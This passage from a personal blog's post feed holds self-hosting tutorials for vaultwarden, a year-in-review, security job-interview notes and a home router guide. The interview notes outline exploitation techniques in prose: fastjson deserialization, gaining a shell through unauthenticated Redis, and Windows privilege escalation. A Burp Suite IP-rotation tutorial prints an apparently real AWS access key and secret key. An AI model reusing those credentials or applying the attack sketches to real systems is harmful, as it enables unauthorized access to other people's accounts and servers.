href="#auto-backup">public cloud</a> above, so I won't repeat it.</p><h2 id="常见问题"><a href="#常见问题" class="headerlink" title="常见问题"></a>Common problems</h2><p>If your <code>vaultwarden</code> has problems and recreating the container doesn't help no matter how many times you try, I suggest first cleaning up unused volumes and the like; see: <a href="https://note.qidong.name/2017/06/26/docker-clean/">https://note.qidong.name/2017/06/26/docker-clean/</a></p><p>If the problem persists, it may be the registry mirror. Open the <code>docker</code> settings page in the BaoTa panel and set the accelerator URL to:</p><figure class="highlight json"><pre><code class="hljs json">{
  "registry-mirrors": [
    "https://mirror.baidubce.com"
  ]
}
</code></pre></figure><p>Then run <code>systemctl daemon-reload</code> and <code>systemctl restart docker</code> (on CentOS) to restart the <code>docker</code> service. After this change I reopened the <code>vaultwarden</code> web page and was pleasantly surprised to find the page icon had changed, so it really may have been the mirror.</p><h2 id="总结"><a href="#总结" class="headerlink" title="总结"></a>Summary</h2><p>In this article I showed how to set up automatic backups of the password database, adding one more layer of protection for your data. The same approach also works for backing up websites and personal blogs.</p><p>This concludes the tutorial on self-hosting a password manager server for now. If you still have questions or technical problems, leave a comment and I will try to help. Happy early New Year to all of you!</p>]]></content>
<categories>
<category>Life Notes</category>
</categories>
<tags>
<tag>Tutorials</tag>
<tag>Gadget Tinkering</tag>
</tags>
</entry>
<entry>
<title>Setting up vaultwarden on a home server (Part 1)</title>
<link href="/2023/01/04/%E5%AE%B6%E5%BA%AD%E6%9C%8D%E5%8A%A1%E5%99%A8%E6%90%AD%E5%BB%BAvaultwarden%EF%BC%88%E4%B8%80%EF%BC%89/"/>
<url>/2023/01/04/%E5%AE%B6%E5%BA%AD%E6%9C%8D%E5%8A%A1%E5%99%A8%E6%90%AD%E5%BB%BAvaultwarden%EF%BC%88%E4%B8%80%EF%BC%89/</url>
<content type="html"><![CDATA[<h2 id="介绍"><a href="#介绍" class="headerlink" title="介绍"></a>Introduction</h2><p>As an information security enthusiast, protecting your personal information is essential, and one important part of that is protecting your passwords. But every platform has a different password; how do you remember them all? That's where password management software comes in. A while ago the paid password manager <code>lastpass</code> had its database stolen, which made me even more wary of public password management services. By chance, while chatting in a Telegram group, I learned about <code>bitwarden</code>, an open-source, free, self-hostable, multi-platform password manager, and thought I would set one up on the virtual server at home. However, official <code>bitwarden</code> stores its data in <code>SQL server</code>, which demands too much of the server, so I went with <code>vaultwarden</code>, a likewise free and open-source third-party password manager whose server is rewritten in <code>Rust</code> and much lighter.</p><p>Project page: <a href="https://github.com/dani-garcia/vaultwarden">https://github.com/dani-garcia/vaultwarden</a></p><p>This may be the only tutorial on the whole web about setting up <code>vaultwarden</code> on a server at home. Most online tutorials use a public-cloud VPS, but a domestic VPS requires ICP filing before use, which is time-consuming and risks leaking personal information; the other option is a Synology NAS at home, but my NAS is too low-spec and its <code>ARM</code> architecture doesn't support <code>docker</code>, so I had to give up that route. Because domestic home broadband, unlike a VPS, doesn't open ports 80 and 443, and setting up an <code>Nginx</code> reverse proxy on a server isn't as simple as on a Synology NAS, I hit quite a few pitfalls. Below I show step by step how to set up the open-source password manager <code>vaultwarden</code> and build your own private vault to keep your credentials safer.</p><h2 id="正文"><a href="#正文" class="headerlink" title="正文"></a>Main text</h2><h3 id="准备"><a href="#准备" class="headerlink" title="准备"></a>Preparation</h3><p>First you need a <code>Linux</code> server with <code>docker</code> and <code>docker-compose</code> installed, and a purchased domain name. For home broadband you need a public IP address, and the domain must have <code>ddns</code> configured in advance (I covered the Alibaba Cloud method in an earlier post; other registrars are similar, all updating the DNS record through an API). You can install everything from the command line, but to save effort I used the BaoTa panel (you can also use its international version, <code>aapanel</code>, which is more secure). Then pull the <code>vaultwarden</code> image; since the image-pull feature of my BaoTa panel was broken, I had to use the command:</p><figure class="highlight bash"><pre><code class="hljs bash">docker pull vaultwarden/server:latest
</code></pre></figure><h3 id="踩坑"><a href="#踩坑" class="headerlink" title="踩坑"></a>Pitfalls</h3><p>Don't rush after pulling. First install <code>Nginx</code> and create a website: click "Add site", fill in your purchased domain under "Create site", and be sure to include the port number. To avoid possible future conflicts, for the LAN <code>http</code> port I didn't use 80 but a fairly large number. Choose "Pure static" for the <code>PHP</code> version, create nothing else, and click "Submit":</p><p><img src="https://s2.loli.net/2023/01/05/mF6CaR8WiEdZlq1.png"></p><p>Next, create a folder <code>vw-data</code> under the root directory to store <code>vaultwarden</code>'s data, then go back to the site you just created and change its site directory to this folder. You can also use the site directory generated automatically when creating the site, but then the "server directory" under "Mount volume" in the screenshot below must also be changed to that auto-generated directory, i.e. <code>/www/wwwroot/abc.com/</code>. Once ready, create the corresponding <code>docker</code> container, filling in the red-boxed fields as in the screenshots:</p><p><img src="https://s2.loli.net/2023/01/05/PFzU1Ie8CGwtSMT.png"></p><p><img src="https://s2.loli.net/2023/01/05/kyTwAMEg4Zh5Qt8.png" alt="2"></p><p><strong>Note: the server port here must match the one entered when creating the site, and the two steps, creating the site and creating the container, must not be swapped, otherwise you will get a "port already in use" error!</strong></p><p>Because <code>vaultwarden</code>'s web UI must be accessed over <code>https</code> before an account can be created, we have to configure an <code>SSL</code> certificate. According to the official documentation, mounting the <code>SSL</code> certificate into <code>docker</code> prevents live sync from working, so we use an <code>Nginx</code> reverse proxy instead. Click "Settings" to the right of your site, then "SSL" on the left, and request a certificate or enter an existing one; a wildcard certificate is recommended.</p><p>Then click "Reverse proxy" in the left sidebar, click "Add reverse proxy", enter <code>http://127.0.0.1:the LAN http port you set earlier</code> as the "Target URL", leave the rest blank, submit, then click "Config file" and replace its contents with the following:</p><figure class="highlight nginx"><pre><code class="hljs nginx">location / {
    # replace port 6666 with the http port you set earlier
    proxy_pass http://127.0.0.1:6666;
    proxy_http_version 1.1;
    proxy_cache_bypass $http_upgrade;
    proxy_set_header Upgrade $http_upgrade;
    proxy_set_header Connection "upgrade";
    proxy_set_header Host $host;
    proxy_set_header X-Real-IP $remote_addr;
    proxy_set_header X-Forwarded-For $proxy_add_x_forwarded_for;
    proxy_set_header X-Forwarded-Proto $scheme;
    proxy_set_header X-Forwarded-Host $host;
    proxy_set_header X-Forwarded-Port $server_port;
}

location /notifications/hub {
    proxy_pass http://127.0.0.1:3012;
    # WebSocket upgrades require HTTP/1.1 towards the upstream
    proxy_http_version 1.1;
    proxy_set_header Upgrade $http_upgrade;
    proxy_set_header Connection "upgrade";
}

location /notifications/hub/negotiate {
    # replace port 6666 with the http port you set earlier
    proxy_pass http://127.0.0.1:6666;
}

location /admin {
    proxy_set_header Host $host;
    proxy_set_header X-Real-IP $remote_addr;
    proxy_set_header X-Forwarded-For $proxy_add_x_forwarded_for;
    proxy_set_header X-Forwarded-Proto $scheme;
    # replace port 6666 with the http port you set earlier
    proxy_pass http://127.0.0.1:6666;
}
# add a robots.txt to keep search-engine crawlers out
location = /robots.txt {
    # change to your own directory
    root /home/wwwroot/Bitwarden;
}
</code></pre></figure><p>Likewise, to avoid future conflicts I didn't use 443 for the LAN <code>https</code> port either; instead I went to "Config file" in the left sidebar and replaced the 443 port in the red box with another one:</p><p><img src="https://s2.loli.net/2023/01/05/GoNxQtYZhVUwLlO.png"></p><p>After editing, don't forget to reload the <code>Nginx</code> configuration, or simply restart <code>Nginx</code>.</p><p>Finally, set up port forwarding (some routers call it "port mapping") on your optical modem or router, remembering that the external port cannot be 80 or 443. After all this, in theory <code>https://domain:external non-standard https port</code> should be reachable, but in practice the web UI would not open no matter what.</p><p>Time to introduce the star of this adventure: <code>Nginx Proxy Manager</code>!</p><h3 id="正道"><a href="#正道" class="headerlink" title="正道"></a>The right way</h3><p>At bottom, <code>Nginx Proxy Manager</code> is just a graphical management panel. We install it with <code>docker-compose</code> as well: create a folder <code>npm</code> (any name works) under <code>/root</code>, create a <code>docker-compose.yml</code> file inside <code>npm</code> and fill it with:</p><figure class="highlight yaml"><pre><code class="hljs yaml">version: '3'
services:
  app:
    image: 'jc21/nginx-proxy-manager:latest'
    restart: unless-stopped
    ports:
      - '4636:80'  # the LAN http port on the left can be changed
      - '4637:81'  # the LAN GUI management port on the left can be changed
      - '4638:443'  # the LAN https port on the left can be changed
</code></pre></figure><p>Run <code>docker-compose up -d</code> to create the <code>Nginx Proxy Manager</code> container, then from inside the LAN open <code>http://LAN ip:4637</code> to reach the <code>Nginx Proxy Manager</code> back end. The default account and password are:</p><figure class="highlight plaintext"><pre><code class="hljs plaintext">Email: admin@example.com
Password: changeme
</code></pre></figure><p>After logging in it is best to change the email and password; the email is used to remind you to renew the <code>SSL</code> certificate. Click "Hosts" in the top menu and choose "Proxy Hosts" from the drop-down:</p><p><img src="https://s2.loli.net/2023/01/05/1vMidgXtnGr6CJx.png"></p><p>Click "Add Proxy Host" on the right and fill in the fields as in the screenshot:</p><p><img src="https://s2.loli.net/2023/01/05/wjZbTVMs7cUFXxK.png"></p><p>The IP of the <code>vaultwarden</code> container can be seen in the BaoTa panel.</p><p>Next set up the <code>SSL</code> certificate; you can use one you have already obtained or the issuance feature built into <code>Nginx Proxy Manager</code>. I used my own. Click "SSL Certificates" in the top menu, then "Custom" under the "Add SSL Certificate" drop-down:</p><p><img src="https://s2.loli.net/2023/01/05/3MTFpUkJ4aoW1Hq.png"></p><p><img src="https://s2.loli.net/2023/01/05/NF2L4VGvoxKZq1l.png"></p><p>After setting up the certificate, return to the reverse proxy page and select the certificate just uploaded:<img src="https://s2.loli.net/2023/01/05/mlDzZsXuCrhUqjo.png"></p><p>I don't recommend enabling the "Force SSL" option here, because in my tests enabling it on a non-standard port caused problems.</p><p>Finally, set up port forwarding (some routers call it "port mapping") on your optical modem or router, remembering that the external port cannot be 80 or 443.</p><p>Enter <code>https://your domain:external https port</code> in a desktop browser and it works perfectly:</p><p><img src="https://s2.loli.net/2023/01/05/XUoK96imxGTOLAs.png"></p><p>Not done yet: after clicking "Create account" to create your own account, if you don't want anyone else using your vault, be sure to disable user registration. Once disabled, you can still invite others by email, but that requires configuring an <code>SMTP</code> server.</p><p>How to disable it? First delete the <code>vaultwarden</code> container you created; don't worry about losing the account you just created, because it is stored in the server's mount directory, <code>/vw-data</code> in my setup. After deleting it, create the docker container again with the same <code>vaultwarden/server:latest</code> image, but this time no port mapping is needed, and the "Environment variables" section must contain the following:</p><figure class="highlight bash"><pre><code class="hljs bash">SIGNUPS_ALLOWED=false  # disable user registration
WEBSOCKET_ENABLED=true  # enable live sync
INVITATIONS_ALLOWED=true  # allow registration by invitation
ADMIN_TOKEN=xxxxxxxxxxx  # fill in your own, generated with: openssl rand -base64 48 ; keep it safe!
</code></pre></figure><p>After starting the container, if the container IP has changed, remember to update it in the <code>Nginx Proxy Manager</code> panel, otherwise the service will be unreachable. Enter <code>https://your domain:external https port/admin</code> in a desktop browser, enter the generated <code>ADMIN_TOKEN</code>, and you can configure the domain, <code>SMTP</code> server, two-step verification and so on in the admin panel.</p><h2 id="思考"><a href="#思考" class="headerlink" title="思考"></a>Thoughts</h2><p>Of course, self-hosting a password manager carries risks: from a network security perspective, exposing ports to the internet increases the attack surface and the chance of being compromised. So I tried setting the "Server URL" under "Self-hosted" to the LAN IP and connecting to the password server over a <code>wireguard VPN</code> when syncing, but in practice it did not work as I had hoped. Take logging in from an Android phone as an example.</p><ul><li>When I entered <code>http://LAN ip:LAN port</code> and logged in, the error was:</li></ul><p><img src="https://s2.loli.net/2023/01/05/FZteokx4Phim69a.jpg" alt="Xiaomi http"></p><ul><li>When I entered <code>https://LAN ip:LAN port</code> and logged in, the error was:</li></ul><p><img src="https://s2.loli.net/2023/01/05/d79KXQNeTzm1uED.jpg" alt="Xiaomi https"></p><h2 id="总结"><a href="#总结" class="headerlink" title="总结"></a>Summary</h2><p>In the next tutorial I will cover some advanced tricks such as scheduled backups, giving your data an extra layer of protection.</p><p>That's the whole tutorial on setting up <code>vaultwarden</code>. If anything is unclear or you have questions, leave a comment and I will try to help. See you next time!</p>]]></content>
<categories>
<category>Life Notes</category>
</categories>
<tags>
<tag>Tutorials</tag>
<tag>Gadget Tinkering</tag>
</tags>
</entry>
<entry>
<title>2022 year in review</title>
<link href="/2022/12/21/2022%E5%B9%B4%E5%BA%A6%E6%80%BB%E7%BB%93/"/>
<url>/2022/12/21/2022%E5%B9%B4%E5%BA%A6%E6%80%BB%E7%BB%93/</url>
<content type="html"><![CDATA[<h2 id="前言"><a href="#前言" class="headerlink" title="前言"></a>Preface</h2><p>2022 was destined to be an extraordinary year: the Beijing Winter Olympics, the Russia-Ukraine war, the Shanghai lockdown, the 20th Party Congress, Zhengzhou Foxconn, the end of lockdowns... After two years, I am once again writing a review of this extraordinary year and of my own journey through it.</p><h2 id="正文"><a href="#正文" class="headerlink" title="正文"></a>Main text</h2><p>I still remember that at the beginning of the year, when the Beijing Winter Olympics were held, a certain large security vendor recruited several hundred white-hat volunteers for event security assurance. So many people applied that even paying their own way and missing New Year with their families could not dampen the white hats' enthusiasm. Having been in the security field for barely half a year, with no internship or HW experience, I saw it as a great training opportunity and applied too. Sadly, I missed that chance. In the days that followed I studied Python at home, learned to write simple scripts and crawlers, and came to love this simple and handy language.</p><p>In the blink of an eye the winter break ended and I entered the semester with the heaviest course load of my undergraduate years, the second semester of sophomore year. Five major courses and three general courses, including two taught entirely by foreign instructors; it would be a lie to say it wasn't tiring. Seeing the timetable broke me: the major courses covered by the 408 postgraduate entrance exam alone accounted for two of them! Since I had no plans to sit the postgraduate exam, and those courses were heavily theoretical and, to me, dull, I couldn't muster any interest in the school curriculum. The school happened to be offering a Java course, so I thought I would build a solid Java foundation with it to prepare for code auditing later, but the course content was just as disappointing. I had no choice but to turn to "Bilibili University"; let me recommend the Java basics course by Shangguigu's "Kang Laoshi" and Donglijiedian's Lao Du's Java Web course, both are very good! Then finals week arrived; having barely studied the major courses, I scraped through the exams thanks to my roommates, and in the end, to my surprise, I didn't fail anything.</p><p>Then another summer break arrived. To keep it from going to waste, my parents arranged a summer internship for me at a research institute in Beijing. It was my first time renting a place on my own, my first taste of Beijing's rush hour (three hours a day commuting between the office and my rental), my first time taking the high-speed train and a plane by myself, and my first time cooking for myself. During the internship I first came into contact with binary security, which I personally consider the pinnacle of all technical directions in information security. Since I had no background in binary security at all, I was only asked to learn to use the fuzzing tool AFL (I will write a technical article later on how to use it) and some simple assembly. But a summer internship is short, and two months later the break drew to a close. Unexpectedly, what came next lit the "fuse" and changed my life plans.</p><p>At the time I had finished the second overhaul of my home network, but I always felt it wasn't very secure: I had a public IP, and to manage the devices at home from outside I had forwarded a lot of internal ports to the internet, a serious threat to the home network. For example, port 22 of the Synology NAS on the LAN was constantly being brute-forced, and even after I changed the default port nmap could still fingerprint it. So I planned to use a VPN to tunnel into the LAN and manage all those devices. To my surprise, when I tested from outside using my phone's mobile data, it apparently triggered the traffic-signature rules in the ISP's equipment room, and the next morning I got a call from the cyber police warning me not to "climb the wall" again; they even came to my door. I was baffled: it was just a VPN into my own LAN, how did that become "climbing the wall"? And why a home visit? It made me realize that in this walled country technology itself is treated as guilty, whatever it is used for. This lit the fuse of my desire to leave and made me decide to study abroad.</p><p>In truth, even before this the urge to leave had been stirring: daily queues for COVID tests, endless involution, effort that isn't necessarily rewarded, the impetuous domestic security scene, the age-35 career crisis... all these social realities hung over my head like swords, driving me to get out of this country as soon as possible. This incident merely lit the "fuse" and made me re-examine myself and plan my life. Giving up existing connections at home and the job my parents had arranged to start over abroad is a hard decision for many people, but given the domestic emphasis on so-called "guanxi" over people who actually get things done, the impetuousness and involution of the domestic cybersecurity industry, and various other reasons, I made up my mind to leave. Fortunately, although I slacked off in my undergraduate courses, my average and GPA aren't too ugly, and I can still apply to a decent master's program.</p><p>Looking back on the year, besides technology I also very nearly found love. In the second semester of sophomore year, by chance, I added a first-year girl on QQ through the campus confession wall, and unexpectedly she took a liking to me; I even went on the first offline date of my life. In her eyes I was an outstanding (though I don't think so myself), sincere guy with a perfect height, but I felt we weren't right for each other, and in the end I lost my chance at romance. Call it a small regret of the year!</p><h2 id="结尾"><a href="#结尾" class="headerlink" title="结尾"></a>Ending</h2><p>I hope that in the new year 2023 I can part amicably with IELTS and get into my dream school! To everyone reading this: may your wishes come true, stay healthy (and test negative for COVID), and all the best! May those sitting the postgraduate exam pass on the first try, those who didn't land a job in autumn recruitment succeed in spring, and those already employed get promoted and get raises. Happy early New Year to you all!</p>]]></content>
<categories>
<category>Life Notes</category>
</categories>
</entry>
<entry>
<title>Notes from a first-round interview for a security-assurance (重保) project</title>
<link href="/2022/09/17/%E9%87%8D%E4%BF%9D%E4%B8%80%E9%9D%A2%E9%9D%A2%E7%BB%8F/"/>
<url>/2022/09/17/%E9%87%8D%E4%BF%9D%E4%B8%80%E9%9D%A2%E9%9D%A2%E7%BB%8F/</url>
<content type="html"><![CDATA[<h2 id="前言"><a href="#前言" class="headerlink" title="前言"></a>Preface</h2><p>With the 20th Party Congress approaching, recruitment for 重保 (major-event security assurance) work has begun. Compared with this year's HW, though, there are far fewer recruitment channels. I applied for the intermediate level; below are some of the questions from the interview, which I hope will help anyone taking part in HW or other 重保 projects next time!</p><h2 id="面试题"><a href="#面试题" class="headerlink" title="面试题"></a>Interview questions</h2><p>1. Briefly describe your project experience</p><blockquote><p>(This depends on your own situation, so I won't go into detail)</p></blockquote><p>2. Do you have any HW-related experience?</p><blockquote><p>(Honestly, none; I couldn't go this year for various reasons)</p></blockquote><p>3. What common middleware do you know?</p><blockquote><p>Apache, Nginx, IIS, Tomcat, Fastjson, Weblogic, Struts2...</p></blockquote><p>4. Name some common middleware vulnerabilities, for example in <code>fastjson</code>?</p><blockquote><p>A malicious JSON payload is sent in the request. The vulnerability is that when the JSON object is processed, the @type field is not filtered, so an attacker can pass in the malicious TemplatesImpl class; this class has a field _bytecodes, and some functions generate a Java instance from _bytecodes, so fastjson ends up letting a class be passed in through a field and its constructor executed when the class is instantiated.</p></blockquote><p>5. How do you exploit <code>fastjson</code> when the target has no outbound network access?</p><blockquote><p>Probe which protocols can reach out? (Not sure)</p></blockquote><p>6. How do you determine whether the target uses <code>fastjson</code>?</p><blockquote><p>See: <a href="https://blog.csdn.net/Adminxe/article/details/105918000">Several ways to detect fastjson via dnslog</a>, or use a detection tool</p></blockquote><p>7. A server has been compromised but no security appliances are deployed; how do we respond?</p><blockquote><p>Analyze from the system side (logs, processes, startup items)?</p></blockquote><p>8. Have you worked with security vendors' appliances?</p><blockquote><p>(If not, say so; don't bluff)</p></blockquote><p>9. What are the common unauthorized-access vulnerabilities?</p><blockquote><p>At the time I could only think of Redis unauthorized access...</p></blockquote><p>10. How do you get a shell through <code>Redis</code> unauthorized access?</p><blockquote><p>Generate an SSH key pair on the attacking machine with an empty passphrase, write the generated public key in, then connect with the private key.</p></blockquote><p>11. What are the common Windows privilege-escalation methods?</p><blockquote><p>1. Kernel overflow exploits</p><p>2. Database privilege escalation</p><p>3. Misconfigured system settings</p><p>4. DLL hijacking</p><p>5. Privileged third-party software or services</p><p>6. Token stealing</p><p>7. Web middleware vulnerabilities</p><p>8. AT, SC, PS (scheduled task) escalation, and so on</p></blockquote><p>12. What are the OWASP Top 10 vulnerabilities?</p><blockquote><p>See: <a href="https://blog.csdn.net/qq_38612882/article/details/122696374">2022 Penetration Testing: the OWASP Top 10 explained in detail</a></p></blockquote><p>13. What is the difference between a bind shell and a reverse shell?</p><blockquote><p>Bind shell: the controller actively initiates the connection to the controlled host; reverse shell: the controlled host actively connects back to the controller</p></blockquote><p><strong>Answer the following according to your own situation:</strong></p><p>14. Would you accept being posted to another city?</p><p>15. What is your expected salary?</p>]]></content>
<categories>
<category>Life Notes</category>
</categories>
<tags>
<tag>Interview Notes</tag>
</tags>
</entry>
<entry>
<title>Burp Suite proxy-pool extension: IPRotate setup tutorial</title>
<link href="/2022/09/17/Burpsuite%E4%BB%A3%E7%90%86%E6%B1%A0%E6%8F%92%E4%BB%B6-IPRotate%E9%85%8D%E7%BD%AE%E6%95%99%E7%A8%8B/"/>
<url>/2022/09/17/Burpsuite%E4%BB%A3%E7%90%86%E6%B1%A0%E6%8F%92%E4%BB%B6-IPRotate%E9%85%8D%E7%BD%AE%E6%95%99%E7%A8%8B/</url>
<content type="html"><![CDATA[<h2 id="前言"><a href="#前言" class="headerlink" title="前言"></a>Preface</h2><p>Recently someone in a security group shared a Burp Suite extension that hides your own IP while capturing traffic: it lets you hide your source IP during interception without manually configuring proxy chains. I hit a lot of pitfalls during installation, though, so I am writing this up to save others the detours.</p><h2 id="正文"><a href="#正文" class="headerlink" title="正文"></a>Main text</h2><p>The extension is hosted on GitHub: <a href="https://github.com/RhinoSecurityLabs/IPRotate_Burp_Extension">https://github.com/RhinoSecurityLabs/IPRotate_Burp_Extension</a></p><p>Because it is a Python extension that depends on a Python 2 environment, you need to set up Jython: <a href="https://www.jython.org/download">Downloads | Jython</a></p><p><img src="https://s2.loli.net/2022/02/24/CiLkqxArjSFw1QH.png" alt="img"></p><p>Configure the extension dependency in Burp Suite (avoid paths containing Chinese characters):</p><p><img src="https://s2.loli.net/2022/02/24/hM789wHs5ZmnPJl.png" alt="img"></p><p>Once that was ready I hit the first pitfall: conflicts between different Python versions.</p><p>My computer previously only had Python 3.9, so I downloaded the latest Python 2 release, 2.7.18, from the official site and let it configure the Windows environment variables automatically. However, typing python3 at the command line opened the Microsoft Store (you have probably all seen this). Just rename the python.exe files of the different versions to python2.exe and python3.exe and the problem is solved:</p><p><img src="https://s2.loli.net/2022/02/24/lUmtfGNM1kXsFeu.png" alt="img"></p><p>Next, the Burp Suite extension settings page complains that the third-party library boto3 is missing. Be careful to install it in the Python 2 environment, but installing it directly with pip gave me an error (forgot to take a screenshot):</p><figure class="highlight plaintext"><pre><code class="hljs plaintext">Fatal error in launcher:Unable to create process using '"C:\python27\python.exe" "C:\Python27\Scripts\pip.exe"'install boto3
</code></pre></figure><p>You can use anaconda to install packages across versions, or use the method from the article below (on Windows, copy the script from the URL yourself):</p><p><a href="https://blog.csdn.net/weixin_42478365/article/details/116801930">How to fix Python 2 without pip on Kali Linux (CSDN blog)</a></p><p>After running the script with python2, pip2 can install packages normally. The result:</p><p><img src="https://s2.loli.net/2022/02/24/wiPNoEtMdV4fKXr.png" alt="img"></p><p>Once installed, enter the following access key and secret key to activate it:</p><figure class="highlight plaintext"><pre><code class="hljs plaintext">Access Key:AKIAISGP63MXTUVKLTHA
Secret Key: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
</code></pre></figure><p>Since this is a test environment, start a server on the VPS with Python's built-in http module (port 80 in my example):</p><figure class="highlight bash"><pre><code class="hljs bash">python3 -m http.server PORT  # python3
python -m SimpleHTTPServer PORT  # python2
</code></pre></figure><p>Start the extension first (Target Host is the VPS IP), then visit the VPS IP and port in the browser, switch the proxy and capture the request with Burp Suite:</p><p><img src="https://s2.loli.net/2022/02/24/QjKzNmqnuYOscoD.png" alt="img"></p><p>The VPS shows the request IP; replaying the request in Burp Suite's Repeater shows the request IP changing:</p><p><img src="https://s2.loli.net/2022/02/24/DZcHU4nNXbVeI15.png" alt="img"></p><p>Note that the requests must be sent through Burp Suite, otherwise the proxy pool is not triggered.</p><h2 id="总结"><a href="#总结" class="headerlink" title="总结"></a>Summary</h2><p>Because my skills are weak, this took nearly a whole afternoon. The benefit is that no proxy pool has to be configured by hand, saving the time spent screening usable proxy IPs. Thanks again to the group expert for the help!</p>]]></content>
<categories>
<category>Web Security</category>
</categories>
<tags>
<tag>Tutorials</tag>
</tags>
</entry>
<entry>
<title>Home network overhaul (Part 2)</title>
<link href="/2022/06/29/%E5%AE%B6%E5%BA%AD%E7%BD%91%E7%BB%9C%E6%94%B9%E9%80%A0%EF%BC%88%E4%B8%8B%EF%BC%89/"/>
<url>/2022/06/29/%E5%AE%B6%E5%BA%AD%E7%BD%91%E7%BB%9C%E6%94%B9%E9%80%A0%EF%BC%88%E4%B8%8B%EF%BC%89/</url>
<content type="html"><![CDATA[<h2 id="前言"><a href="#前言" class="headerlink" title="前言"></a>Preface</h2><p>In the previous article I used OpenWrt as the main router. It handles PPPoE dial-up plus proxying just fine, but its dial-up stability is frankly poor: after every reboot I had to log in to the OpenWrt backend and reconnect the interface by hand. That is no problem while I am at home, but whenever I rebooted remotely while away, the house lost internet for days, and I took plenty of scolding from my parents for it. In the end I settled on the currently popular dual soft-router setup: an iKuai VM in ESXi acts as the main router and handles PPPoE, while the OpenWrt VM becomes a bypass router for proxying, ad blocking and other advanced tricks.</p><h2 id="正文"><a href="#正文" class="headerlink" title="正文"></a>Main Text</h2><h3 id="安装主路由系统"><a href="#安装主路由系统" class="headerlink" title="安装主路由系统"></a>Installing the Main Router System</h3><p>First, set up NIC passthrough; there are plenty of tutorials online, so I will not repeat the steps here. In the previous tutorial the OpenWrt WAN port was not passed through, which can reduce real-world bandwidth and eat CPU, so I do not recommend doing it that way. Next, go to the iKuai official site, download the latest ISO image and upload it to ESXi: <a href="https://www.ikuai8.com/component/download">https://www.ikuai8.com/component/download</a></p><p>Open the ESXi web management UI and create the iKuai VM. Choose "Create new virtual machine", then choose "Other 3.x Linux (64-bit)":</p><p><img src="https://s2.loli.net/2022/09/17/cKmTCOfZtFhXQRw.png" alt="img"></p><p>Pick the CPU core count as needed; give it plenty of memory, ideally 4 GB, which you can reduce to 1-2 GB after installation. The USB controller can be removed; for the CD/DVD drive remember to select the iKuai ISO you just uploaded.</p><p>Now the important step: be sure to add the passed-through NIC as the WAN port! Choose "Add other device" > "PCI device", pick the NIC you want to pass through, and keep at least one virtual network adapter as the LAN port. Here is a screenshot of my finished settings:</p><p><img src="https://s2.loli.net/2022/09/17/A4Vnm9PrYFjQ5Lq.png" alt="img"></p><p>One last point, and remember it: <strong>when passing through a PCI device, you must tick "Reserve all guest memory (All locked)" under the advanced memory settings, or the VM will not boot!</strong></p><p>Click Finish when done, then power on the VM you just created, select the disk to install to and press Enter; the system reboots automatically once installation completes. After the reboot, we set the iKuai LAN address. Remember: set the management IP in the same subnet as the ESXi LAN! For example, if your ESXi host is 192.168.50.231, the iKuai main router's LAN address should be 192.168.50.xx.</p><p>Type 2 and press Enter to choose "Set LAN1 address":</p><p><img src="https://s2.loli.net/2022/09/17/1TV563FXDBzRawZ.png" alt="img"></p><p>Type 0 and press Enter:</p><p><img src="https://s2.loli.net/2022/09/17/Yb9qCLRUiKgxfzO.png" alt="img"></p><p>Enter "192.168.50.xx"; for easier management I used "192.168.50.1":</p><p><img src="https://s2.loli.net/2022/09/17/on4MZfYL1yU5k2X.png" alt="img"></p><p>Then type 8 on the main menu to reboot the iKuai VM. Once it is back up, the LAN port in the web management address shows the IP you just set!</p><p>At this point the iKuai soft-router VM is installed and minimally configured at the system level. Next I will walk through the detailed internet configuration.</p><h3 id="配置主路由"><a href="#配置主路由" class="headerlink" title="配置主路由"></a>Configuring the Main Router</h3><p>Open a browser, enter the iKuai management IP and configure it from the web UI. The default username and password are both admin. If the iKuai backend does not open at the management IP, the machine you are using is probably not on the same LAN; set your computer's network manually to the same subnet as the iKuai soft router and try again.</p><p><strong>After logging in you will be prompted to bind the iKuai cloud platform. Skip it for now, since iKuai has no internet connection yet; bind later if you need it.</strong></p><p>Under "Network Settings" > "DHCP Settings" > "DHCP Server" in the left menu, create a new DHCP service:</p><p><img src="https://s2.loli.net/2022/09/17/Gyepkt4lXAbhwz1.png" alt="img"></p><p>Set the primary DNS to the OpenWrt (op) IP address; the secondary DNS can be whatever you prefer. Because my ASUS router was already at 192.168.50.2, I set the pool to start handing out addresses from 192.168.50.3. Save when done.</p><p>Next, bind the WAN port: on the iKuai home page under "System Overview", click the wan1 icon, select the NIC we passed through earlier and bind it. Change the access mode to "ADSL/PPPoE dial-up", enter your broadband username and password and save. With the other end of the cable plugged into the optical modem's LAN port, the dial-up connection comes up:</p><p><img src="https://s2.loli.net/2022/09/17/RVJoafHmLjOQY1n.png" alt="img"></p><p><strong>Note: after a successful dial-up, the WAN icon on the iKuai web home page turns green and the status shows connected. If not, the dial-up failed; check that the credentials are correct and that the optical modem is in bridge mode.</strong></p><p>Similarly, bind the LAN port to the virtual NIC set up in ESXi at the start, with the same IP address as the LAN address configured earlier. If your soft router has enough physical ports, you can bind the LAN port to a passed-through NIC too. Mine only has two gigabit ports, so the iKuai LAN port uses the virtual NIC.</p><p>That completes the installation and tuning of the iKuai main router!</p><h3 id="配置旁路由"><a href="#配置旁路由" class="headerlink" title="配置旁路由"></a>Configuring the Bypass Router</h3><p>OpenWrt was already installed as a VM earlier, so only a small change to the op VM's network configuration is needed. Back in the ESXi management page, remove op's passed-through NIC and keep just one virtual NIC (again, if your soft router has enough ports you can bind the LAN port to a passed-through NIC instead):</p><p><img src="https://s2.loli.net/2022/09/17/pj7wNJRrTPECclu.png" alt="img"></p><p>Confirm the settings, save and power on. I set op's management IP to 192.168.50.235. So how do you change op's management IP?</p><p>In op's web console, enter the command:</p><figure class="highlight awk"><table><tr><td class="code"><pre><code class="hljs awk">vi /etc/config/network<br></code></pre></td></tr></table></figure><p>Use the arrow keys to move the cursor to the line:</p><figure class="highlight gams"><table><tr><td class="code"><pre><code class="hljs gams">option ipaddr '192.168.2.1'<br></code></pre></td></tr></table></figure><p>Switch your input method to English mode, press i to start editing, and change it to the LAN IP address you want. When done, press Esc first, then Shift+: (the colon key); a colon prompt appears at the bottom. Type wq and press Enter to save, then reboot the op VM.</p><p>Log in to the op backend; the default username and password differ between firmware builds. Under "Network" > "Interfaces" in the left menu, edit the LAN interface. Set the gateway to the iKuai IP; for DNS I used 114.114.114.114 and 223.5.5.5, but you can use any you prefer, such as your ISP's DNS:</p><p><img src="https://s2.loli.net/2022/09/17/KWeOiAt76vqCfp4.png" alt="img"></p><p>In the DHCP Server settings at the bottom, tick "Ignore interface", set everything under the IPv6 settings to disabled, then click Save:</p><p><img src="https://s2.loli.net/2022/09/17/e2MThAytPkUpoVz.png" alt="img"></p><p>Save the settings and you should be 